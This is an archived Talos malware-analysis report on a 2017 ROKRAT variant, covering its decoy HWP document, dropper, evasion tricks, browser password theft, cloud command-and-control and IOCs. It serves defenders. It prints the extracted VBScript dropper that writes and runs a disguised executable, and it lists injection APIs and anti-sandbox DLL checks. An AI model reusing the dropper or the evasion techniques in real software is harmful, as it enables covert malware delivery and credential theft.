{ "id": "b7d2a0c3-bb9a-4764-9e30-2a16ff71731d", "created_at": "2026-04-06T00:19:01.51294Z", "updated_at": "2026-04-10T13:12:52.545176Z", "deleted_at": null, "sha1_hash": "f9bbdfcef89e6b8b0f5437cde9b27e9e7fda969a", "title": "ROKRAT Reloaded", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1366124, "plain_text": "ROKRAT Reloaded\r\nBy Paul Rascagneres\r\nPublished: 2017-11-28 · Archived: 2026-04-05 20:42:48 UTC\r\nThis post was authored by Warren Mercer, Paul Rascagneres and with contributions from Jungsoo An.\r\nExecutive Summary\r\nEarlier this year, Talos published 2 articles concerning South Korean threats. The\r\nfirst one was about the use of a malicious HWP document which dropped\r\ndownloaders used to retrieve malicious payloads on several compromised websites.\r\nOne of the website was a compromised government website. We named this case\r\n\"Evil New Years\". The second one was about the analysis and discovery of the\r\nROKRAT malware.\r\nThis month, Talos discovered a new ROKRAT version. This version contains technical elements that link the two\r\nprevious articles. This new sample contains code from the two publications earlier this year:\r\nIt contains the same reconnaissance code used;\r\nSimilar PDB pattern that the \"Evil New Years\" samples used;\r\nit contains the same cloud features and similar copy-paste methods that ROKRAT used;\r\nIt uses cloud platform as C\u0026C but not exactly the same. This version uses pcloud, box, dropbox and\r\nyandex.\r\nWe also discovered that this new version of ROKRAT shares code with Freenki, a downloader used in the\r\nFreeMilk campaign.\r\nThe campaign started, unsurprisingly, with a malicious HWP document. This document was alleged to be written\r\nby a lawyer who claims to represent the \"Citizens' Alliance for North Korean Human Rights and Reunification of\r\nKorean Peninsula\". It mentions a meeting of this group that took place the 1st of November at Seoul. Due to the\r\ncontent of this malicious document we can assume that the targets are interested by the situation in North Korea.\r\nThis malicious document drops and executes a new version of ROKRAT.\r\nhttps://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html\r\nPage 1 of 20\n\nThe malicious document mentions the \"Community of North Korean human right and unification\". We first\r\nobserved his campaign during November 2017. The document was alleged to be written by a lawyer who has been\r\nrepresenting the community known as '올인통 (올바른북한인권법과통일을위한시민모임)'.\r\nThe purpose of the document is to arrange a meeting to discuss about items which are related to 'North Korean\r\nHuman Rights Act' and 'Enactment of a law' which passed in last 2016 in South Korea.\r\nBased on the meeting date (1st Nov 2017), this decoy document could be delivered to the stakeholders in the\r\ncommunity '올인통' by pretending to be a request to join the discussion for finding better ideas/ways to let more\r\npeople be interested in their activity before Nov 2017.\r\nThe HWP file contains an OLE object named BIN0001.OLE. Once extracted and uncompressed (zlib), we obtain\r\nthe following script:\r\nhttps://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html\r\nPage 2 of 20\n\nconst strEncode = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4A\r\nDIM outFile\r\nDIM base64Decoded\r\nDIM shell_obj\r\nSET shell_obj = CreateObject(\"WScript.Shell\")\r\nDIM fso\r\nSET fso = CreateObject(\"Scripting.FileSystemObject\")\r\noutFile = \"c:\\ProgramData\\HncModuleUpdate.exe\"\r\nbase64Decoded = decodeBase64(strEncode)\r\nIF NOT(fso.FileExists(outFile)) then\r\nwriteBytes outFile, base64Decoded\r\nshell_obj.run outFile\r\nEND IF\r\nWScript.Quit()\r\nprivate function decodeBase64(base64)\r\nDIM DM, EL\r\nSET DM = CreateObject(\"Microsoft.XMLDOM\")\r\nSET EL = DM.createElement(\"tmp\")\r\nEL.DataType = \"bin.base64\"\r\nEL.Text = base64\r\ndecodeBase64 = EL.NodeTypedValue\r\nend function\r\nprivate Sub writeBytes(file, bytes)\r\nDIM binaryStream\r\nSET binaryStream = CreateObject(\"ADODB.Stream\")\r\nbinaryStream.Type = 1\r\nbinaryStream.Open\r\nbinaryStream.Write bytes\r\nbinaryStream.SaveToFile file, 1\r\nEnd Sub\r\nThe purpose is to decode, using the base64 algorithm, the content of the strEncode variable. The decoded data is\r\nstored in the c:\\ProgramData\\HncModuleUpdate.exe file and executed. The binary is the ROKRAT dropper. The\r\nspecific filename 'HncModuleUpdate' may fool a user into thinking this is a Hancom software.\r\nStage 1: Dropper\r\nThe purpose of the dropper is to extract the resource named SBS. This resource\r\ncontains malicious shellcode. Additionally, the dropper executes a new cmd.exe\r\nprocess, injects the extracted resource and executes it. The code injection is\r\nperformed by the VirtualAlloc(), WriteProcessMemory() and\r\nCreateRemoteThread() APIs:\r\nhttps://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html\r\nPage 3 of 20\n\nOnce executed, the shellcode will decoded a PE file, will load it in the memory of cmd.exe and finally will\r\nexecute it. This payload is a new variant of ROKRAT.\r\nAdditionally, one of the analysed droppers displays a picture to the user:\r\nhttps://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html\r\nPage 4 of 20\n\nThe people in the pictures are about the Korean war and people related to independence troops during the\r\n\"independence movement\". The image on the top left comes from Wikipedia. The picture in the middle left comes\r\nfrom this blog. And the bottom left image comes from this news website. The decoy image seems to be a set of\r\npublic pictures.\r\nStage 2: ROKRAT\r\nSimilarities With the \"Evil New Years\" MalDoc\r\nThis variant of ROKRAT contains similar code with the \"Evil New Years\" downloader. The\r\ninformation collected during the reconnaissance phase is similar. The malware uses the following\r\nregistry key to get the machine type:\r\nHKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData. The \"System\r\nmanufacturer\" value is used to identify the type of machine. Here is the graph flow of the \"Evil\r\nNew Years\" downloader:\r\nhttps://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html\r\nPage 5 of 20\n\nThe graph flow of the ROKRAT variant:\r\nThe graph flows are 99% similar. Additionally, the machine type is described with the following strings:\r\nhttps://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html\r\nPage 6 of 20\n\nThe code appears to be based on this forum post describing the use of the Win32 APIs used. The source code only\r\nconsiders the following type:\r\ndefault: lpString = \"(Other)\"; break;\r\ncase 0x02: lpString = \"(Unknown)\"; break;\r\ncase 0x03: lpString = \"(Desktop)\"; break;\r\ncase 0x04: lpString = \"(Low Profile Desktop)\"; break;\r\ncase 0x06: lpString = \"(Mini Tower)\"; break;\r\ncase 0x07: lpString = \"(Tower)\"; break;\r\ncase 0x08: lpString = \"(Portable)\"; break;\r\ncase 0x09: lpString = \"(Laptop)\"; break;\r\ncase 0x0A: lpString = \"(Notebook)\"; break;\r\ncase 0x0E: lpString = \"(Sub Notebook)\"; break;\r\nNotice the () used by the ROKRAT author too. Some values are ignored as we can see from the SMBIOS\r\ndocumentation:\r\nhttps://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html\r\nPage 7 of 20\n\nThe missing values are also omitted from the forum post.\r\nAnother similarity is the PDB path. The \"Evil New Year\" sample contained the following PDB path:\r\ne:\\Happy\\Work\\Source\\version 12\\T+M\\Result\\DocPrint.pdb\r\nThis new ROKRAT variant contains the following PDB:\r\nd:\\HighSchool\\version 13\\2ndBD\\T+M\\T+M\\Result\\DocPrint.pdb\r\nWe clearly have the similar pattern.\r\nhttps://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html\r\nPage 8 of 20\n\nAnti-Sandbox\r\nThis ROKRAT variant contain anti-sandbox tricks. This is performed by checking if the\r\nfollowing libraries are loaded:\r\nSbieDll.dll (sandboxie library)\r\nDbghelp.dll (Microsoft debugging tools)\r\nApi_log.dll (threatAnalyzer / GFI SandBox)\r\nDir_watch.dll (threatAnalyzer / GFI SandBox)\r\nAnti-Debug\r\nThis ROKRAT version contains anti-debug tricks. For example it uses the following NOP\r\ntechnique:\r\nhttps://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html\r\nPage 9 of 20\n\nnop dword ptr [eax+eax+00h] is a 5 bytes NOP: 0x0F1F440000. But this opcode is not correctly supported by\r\nImmunity Debugger, the assembly is replaced by \"???\" in red in the screenshot:\r\nScreenshots Feature\r\nThe two ROKRAT versions performed screenshots. It's interesting to note similarities between\r\nthe two versions. Especially the filename of the saved screenshot, here is the April ROKRAT\r\nversion:\r\nhttps://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html\r\nPage 10 of 20\n\nAnd the code of the November version:\r\nhttps://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html\r\nPage 11 of 20\n\nThe pattern is exactly the same: %s%04X%04X.tmp. The two %04X are random values. And the %s contains a\r\ntemporary path (obtained with GetTempPath()). In both sample, the string length is 0x12C (300). This part is\r\nclearly a copy-paste.\r\nBrowser Password Stealer\r\nOne of the analysed November ROKRAT samples contained a browser stealing capability. The\r\nmalware is able to extract the stored passwords from Internet Explorer, Chrome and Firefox. For\r\nChrome and Firefox, the malware queries the sqlite database containing the URL, username and\r\npassword:\r\nhttps://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html\r\nPage 12 of 20\n\nAdditionally, ROKRAT supports the Microsoft Vault mechanism. Vault was implemented in Windows 7, it\r\ncontains any sensitive data (like the credentials) of Internet Explorer. Here is the initialization of the Vault APIs:\r\nhttps://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html\r\nPage 13 of 20\n\nThe ROKRAT implementation is largely based on the following project. This is a change of tactic for ROKRAT\r\nwhen compared with previous samples/versions. This time the actor is specifically targeting information which\r\nwould be used for additional compromises and maybe even on potential personal accounts. The method used by\r\nthe ROKRAT actors was also out of the ordinary as they embedded the whole SQLite library into their executable\r\nto allow the SQLite browsing attempts used for Firefox \u0026 Google Chrome.\r\nDuring our investigation, we discovered that the browser password stealer code is exactly the same as the code\r\nused during the FreeMilk campaign described by Unit 42. In this article, the author already noticed C2\r\ninfrastructure overlap between FreeMilk and ROKRAT. In addition, we can add that some code overlap is present\r\nbetween the 2 samples:\r\nhttps://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html\r\nPage 14 of 20\n\nOn the left, we have the ROKRAT sample and on the right the FreeMilk sample. We can notice that in addition to\r\nthe code, the author copy-pasted English typos such as \"IE Registery\".\r\npcloud\r\nhttps://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html\r\nPage 15 of 20\n\nBox\r\nhttps://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html\r\nPage 16 of 20\n\nDropbox\r\nYandex\r\nhttps://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html\r\nPage 17 of 20\n\nConclusion\r\nThis campaign shows that the actor behind ROKRAT is still active. Based on the\r\nPDB, it could be the 13th version of this malware. This actor made the decision\r\nonly to use legitimate cloud platforms, but changed some from the last incarnation.\r\nFrom an attacker's perspective it's an interesting choice, the flow is encrypted by\r\ndefault with HTTPS and the malicious flow can be difficult to find in the middle of\r\nlegitimate traffic to these platforms. We can also determine that the actor likes to\r\nuse code already available on the internet in various repositories we mentioned\r\nthroughout this post ie; GitHub, Code Project and other public forums.\r\nBased on source code copy-paste, we remain highly confident that the author of ROKRAT is also behind, or\r\nworking with those behind, the FreeMilk spear phishing campaign. This is further proven by the fact that\r\nROKRAT shares code with Freenki downloader used in the FreeMilk campaign.\r\nMoreover, the actor is always interested by the same pattern of targets, the decoy documents refer to precise\r\nelements related to the geopolitical situation between North and South Korea. Generally, the documents reference\r\nthe Ministry of Unification or the situation of North Korean citizens. They frequently contain specific references\r\nto real meetings or conferences, showing a high knowledge of current events in North and South Korea.\r\nTogether this information helps us to understand the profile of the targeted systems and the interests of the threat\r\nactor.\r\nCoverage\r\nAdditional ways our customers can detect and block this threat are listed below.\r\nhttps://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html\r\nPage 18 of 20\n\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these\r\nthreat actors.\r\nCWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.\r\nEmail Security can block malicious emails sent by threat actors as part of their campaign.\r\nNetwork Security appliances such asNGFW,NGIPS, andMeraki MX can detect malicious activity associated with\r\nthis threat.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs,\r\nwhether users are on or off the corporate network.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nIOCs\r\nPath: c:\\ProgramData\\HncModuleUpdate.exe\r\nMalDoc: 171e26822421f7ed2e34cc092eaeba8a504b5d576c7fd54aa6975c2e2db0f824\r\nDropper #1:\r\na29b07a6fe5d7ce3147dd7ef1d7d18df16e347f37282c43139d53cce25ae7037\r\nDropper #2:\r\neb6d25e08b2b32a736b57f8df22db6d03dc82f16da554f4e8bb67120eacb1d14\r\nDropper #3:\r\n9b383ebc1c592d5556fec9d513223d4f99a5061591671db560faf742dd68493f\r\nROKRAT:\r\nhttps://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html\r\nPage 19 of 20\n\nb3de3f9309b2f320738772353eb724a0782a1fc2c912483c036c303389307e2e\r\nFreenki: 99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5\r\nSource: https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html\r\nhttps://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html\r\nPage 20 of 20\n\n https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html \nAdditionally, ROKRAT supports the Microsoft Vault mechanism. Vault was implemented in Windows 7, it\ncontains any sensitive data (like the credentials) of Internet Explorer. Here is the initialization of the Vault APIs:\n Page 13 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html" ], "report_names": [ "ROKRAT-Reloaded.html" ], "threat_actors": [ { "id": "08c8f238-1df5-4e75-b4d8-276ebead502d", "created_at": "2023-01-06T13:46:39.344081Z", "updated_at": "2026-04-10T02:00:03.294222Z", "deleted_at": null, "main_name": "Copy-Paste", "aliases": [], "source_name": "MISPGALAXY:Copy-Paste", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434741, "ts_updated_at": 1775826772, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f9bbdfcef89e6b8b0f5437cde9b27e9e7fda969a.pdf", "text": "https://archive.orkl.eu/f9bbdfcef89e6b8b0f5437cde9b27e9e7fda969a.txt", "img": "https://archive.orkl.eu/f9bbdfcef89e6b8b0f5437cde9b27e9e7fda969a.jpg" } }